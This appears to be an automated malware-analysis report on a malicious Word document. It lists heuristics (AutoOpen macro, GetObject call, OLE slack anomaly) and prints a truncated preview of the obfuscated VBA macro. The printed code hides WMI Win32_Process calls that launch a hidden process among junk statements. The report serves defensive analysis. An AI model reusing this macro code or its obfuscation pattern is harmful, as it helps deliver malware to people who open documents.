Verdict: MALICIOUS (Risk Score: 142)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an OLE document with a high-risk heuristic firing for VBA macros and an AutoOpen macro, indicating immediate execution upon opening. The VBA code is heavily obfuscated, making it difficult to determine the exact payload, but the presence of an AutoOpen macro and the GetObject call strongly suggest malicious intent, likely to download and execute a second-stage payload. The OLE slack anomaly also points to potential data hiding or manipulation within the file structure.
Heuristics (5)
- OLE document has large unaccounted-for region (severity: high, OLE_SLACK_ANOMALY): the OLE file is 177,421 bytes but its declared streams total only 86,606 bytes; 90,815 bytes (51%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected (severity: medium, OLE_VBA_MACROS, 2 related findings): document contains VBA macro code.
- AutoOpen macro (severity: high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- GetObject call (severity: high, OLE_VBA_GETOBJ): GetObject call.
- Embedded URL (severity: info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45503 bytes |

SHA-256 of macros.bas: ff8adc948e68e80b589c2703e12aa179312e52fb6909e4a4504d68e329f88d47
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "k8_0801"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Q3_395"
Function m_7_3313()
Select Case O610694_
Case 856301476
P7945_ = (l__538 * Fix(686814843 / CBool(Z7960_9))) - h_9__2 / Oct(472587792) / 664872836 + CStr(S_4516) - 291702533 + ChrB(C_3_9_)
End Select
Select Case l3__989
Case 524506268
o3585_4_ = (Q4___916 * Fix(68779480 / CBool(H7349_91))) - m__33__ / Oct(756626926) / 238428477 + CStr(F6175__) - 961230301 + ChrB(X__9_3)
End Select
Select Case w_3_524
Case 134737171
j9_385 = (c299___ * Fix(652907553 / CBool(z_9200))) - c632_2_4 / Oct(681703735) / 928044950 + CStr(L5_7_40) - 325859610 + ChrB(p08339)
End Select
Select Case W25_8__
Case 787669236
h_1_1_6 = (I95_452_ * Fix(687291470 / CBool(S00_901))) - L2__8_ / Oct(679906984) / 59912940 + CStr(j17_1_24) - 80595103 + ChrB(I48_4_2)
End Select
Select Case R______
Case 697673231
D8_327_9 = (A_5857 * Fix(439689511 / CBool(N987_2__))) - Q_744__ / Oct(177295288) / 2996236 + CStr(P342950) - 322308665 + ChrB(c6_0381)
End Select
Select Case z_168300
Case 969917109
P88_47 = (D_64_5_ * Fix(540033466 / CBool(u_2786))) - A9_4_1 / Oct(28933302) / 856200009 + CStr(q25_5_4) - 946225785 + ChrB(G200672)
End Select
Select Case h655283_
Case 27785945
E3101__ = (I__82_ * Fix(46496789 / CBool(c__018))) - B2_1564 / Oct(922241155) / 216649713 + CStr(k_7_040_) - 636608685 + ChrB(I7987_)
End Select
End Function
Function w_5024(p84753, h62078)
On Error Resume Next
Select Case i28839_9
Case 295330195
w35_695 = (E4897__4 * Fix(933987790 / CBool(i1074_44))) - I_07415_ / Oct(175316490) / 802534161 + CStr(k978_17_) - 601088305 + ChrB(W__8__86)
End Select
Select Case T048_6
Case 123926770
R12194_ = (k_8___28 * Fix(576836159 / CBool(U146350_))) - a98__0_1 / Oct(962277199) / 900648578 + CStr(Q_9_9_) - 407868609 + ChrB(q0214__)
End Select
Select Case l_9665_4
Case 268175503
w112981_ = (C52891 * Fix(550412451 / CBool(v_6749))) - R20028 / Oct(651251203) / 271928447 + CStr(F477_380) - 660387921 + ChrB(o4684_39)
End Select
v1991998 = w5_34067 + "winmgmts:Win32" + Q_51_0_3 + "_ProcessStartup" + S72405
Select Case b__456
Case 196297070
w6_980__ = (C211__45 * Fix(344720736 / CBool(i_4277))) - R_63_1 / Oct(587232471) / 519637392 + CStr(b_10_0) - 989324233 + ChrB(F612_606)
End Select
Select Case V2954_
Case 306390112
w6462_ = (z6_919_4 * Fix(503136049 / CBool(Y7_31_6))) - C_09__67 / Oct(667162280) / 714373574 + CStr(d98217) - 366274017 + ChrB(C0_0_034)
End Select
F29__4 = i_0_04_2 + "winmgmts:Win32" + i_16__ + "_Process" + z510_1
Select Case s85917
Case 317721249
X066090 = (n_9_72 * Fix(241305419 / CBool(u29095))) - a5_0__ / Oct(351756757) / 251683363 + CStr(R938_9) - 772861227 + ChrB(i_1467)
End Select
Select Case w9297_
Case 507224544
M7_10016 = (u6_58279 * Fix(53614763 / CBool(A213_29))) - z645_3_ / Oct(411523928) / 351362613 + CStr(C_97_15) - 563892474 + ChrB(H765450_)
End Select
Select Case J__915
Case 808605171
q73654_ = (r5819_76 * Fix(91823898 / CBool(d94_2__))) - A9_10_ / Oct(328444458) / 289784531 + CStr(G5460_) - 504383416 + ChrB(v30373)
End Select
Set U9814_2_ = GetObject(A_12_92 + v1991998 + U__5062)
Select Case t_8419__
Case 982956485
w6_47_6 = (s2124_ * Fix(12320654 / CBool(w_63341))) - r39_5298 / Oct(35998885) / 572272312 + CStr(Q4151__) - 397465983 + ChrB(d25134)
End Select
Select Case z1342_4_
Case 689330272
N1_695 = (G_471193 * Fix(497901881 / CBool(q55____4))) - z147_948 / Oct(724819746) / 979894920 + CStr(n___92) - 167176566 + ChrB(m__0__41)
End Select
U9814_2_.ShowWindow = G23_1_ + 952579 - 952579 + U9___08
Select Case r__7_06
Case 529770445
F7_137 = (H299
... (truncated)